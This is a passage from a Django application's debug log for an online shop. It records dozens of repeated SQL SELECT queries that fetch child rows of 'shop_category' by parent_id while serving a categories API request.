"shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 02:37:55,812 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 02:37:55,815 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 02:37:55,819 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 02:37:55,822 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 02:37:55,828 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 02:37:55,831 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 02:37:55,835 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 02:37:55,839 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 02:37:55,842 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 02:37:55,848 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 02:37:55,852 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 02:37:55,855 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 02:37:55,859 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 02:37:55,863 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 02:37:55,866 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 02:37:55,872 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 02:37:55,876 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 02:37:55,879 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 02:37:55,883 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 02:37:55,887 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 02:37:55,893 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 02:37:55,896 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 02:37:55,900 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 02:37:55,904 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 02:37:55,907 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 02:37:55,913 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 02:37:55,917 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 02:37:55,921 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 02:37:55,924 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 02:37:55,928 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 02:37:55,932 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 02:37:55,937 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 02:37:55,940 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 02:37:55,943 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 02:37:55,945 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 02:37:55,948 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 02:37:55] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 02:37:57,081 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 02:37:57,088 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 02:37:57,091 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 02:37:57,094 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 02:37:57,097 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 02:37:57,099 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 02:37:57,101 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 02:37:57,103 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 02:37:57,106 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 02:37:57,109 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 02:37:57,111 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 02:37:57,114 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 02:37:57,116 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 02:37:57,118 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 02:37:57,121 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 02:37:57,124 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 02:37:57,126 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 02:37:57,128 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 02:37:57,130 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 02:37:57,134 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 02:37:57,137 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 02:37:57,139 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 02:37:57,143 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 02:37:57,145 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 02:37:57,148 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 02:37:57,151 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 02:37:57,154 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 02:37:57,156 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 02:37:57,158 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 02:37:57,161 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 02:37:57,164 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", 